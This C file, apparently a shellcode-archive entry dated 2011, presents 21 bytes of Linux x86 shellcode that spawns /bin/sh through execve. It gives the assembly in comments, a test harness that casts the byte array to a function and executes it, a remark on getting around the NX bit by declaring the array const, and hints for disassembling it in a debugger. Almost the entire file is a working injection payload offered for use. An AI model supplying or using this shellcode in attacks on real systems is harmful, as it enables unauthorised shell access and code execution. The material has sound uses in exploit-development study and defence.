/*
 *  Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
 *  Date     : 10 Feb 2011
 *  Author   : kernel_panik
 *  Thanks   : cOokie, agix, antrhacks
 */

#include <stdio.h>
#include <string.h>

/*
 *  xor ecx, ecx
 *  mul ecx
 *  push ecx
 *  push 0x68732f2f   ;; hs//
 *  push 0x6e69622f   ;; nib/
 *  mov ebx, esp
 *  mov al, 11
 *  int 0x80
 *         
 */

char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
              "\xe3\xb0\x0b\xcd\x80";

/*
 * This code will segfault on a machine with the NX bit feature enabled 
 *  (on Linux, check with 'cat /proc/cpuinfo | grep nx').
 *
 * However, changing the type of 'code' to 'const char[]' will cause
 *  standard GCC to put it into the .rodata section, which then is
 *  grouped with .text into an _executable_ program segment -- and the
 *  code works (the pages where .rodata ends up do not have the NX bit
 *  set when the virtual process space is created). 
 */

/* 
 *  Hint: you can disassemble the contents of the 'code' variable
 *        in the debugger. Compile with -g option, and then
 *        use the GDB command 'x/8i code' or 'disas code'.  
 *    
 *        Another method would be to look up the offset of code
 *        with readelf or nm, extract it with dd, and then feed
 *        the result into a command-line disassembler such as 
 *        udis86.
 */

int main(int argc, char **argv)
{
 printf ("Shellcode length : %d bytes\n", strlen (code));
 int(*f)()=(int(*)())code;
 f();
}